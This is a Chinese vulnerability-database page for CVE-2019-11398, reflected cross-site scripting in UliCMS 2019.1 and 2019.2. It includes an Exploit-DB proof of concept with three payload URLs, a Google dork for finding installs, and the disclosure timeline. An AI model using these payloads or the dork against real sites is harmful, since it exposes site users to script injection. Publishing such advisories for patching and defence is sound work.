UliCMS 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1579850 漏洞类型 跨站脚本
发布时间 2019-04-23 更新时间 2019-06-11
CVE编号 CVE-2019-11398 CNNVD-ID CNNVD-201904-1034
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019040214
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201904-1034
|漏洞详情
UliCMS是一套开源内容管理系统。 UliCMS 2019.2版本和2019.1版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
|漏洞EXP
# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Exploit Author: Kağan EĞLENCE
# Vendor Homepage: https://en.ulicms.de/
# Version: 2019.2 , 2019.1
# CVE : CVE-2019-11398

### Vulnerability 1

Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/loginform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)

Result : <input type="hidden" name="go" value='asd' accesskey='X'
onclick='alert(1)'>

### Vulnerability 2

Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/registerform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1)

Result : <input type="hidden" name="go" value='asd' accesskey='X'
onclick='alert(1)'>

### Vulnerability 3 - Authenticated

Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
Request Type: GET
Vulnerable Parameter : "error"
Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E

### History
=============
2019-04-13  Issue discovered
2019-04-13  Vendor contacted
2019-04-13  Vendor response and hotfix
2019-04-14  Vendor releases fixed versions
2019-04-22  Advisory release
|参考资料

来源:www.exploit-db.com

链接:https://www.exploit-db.com/exploits/46741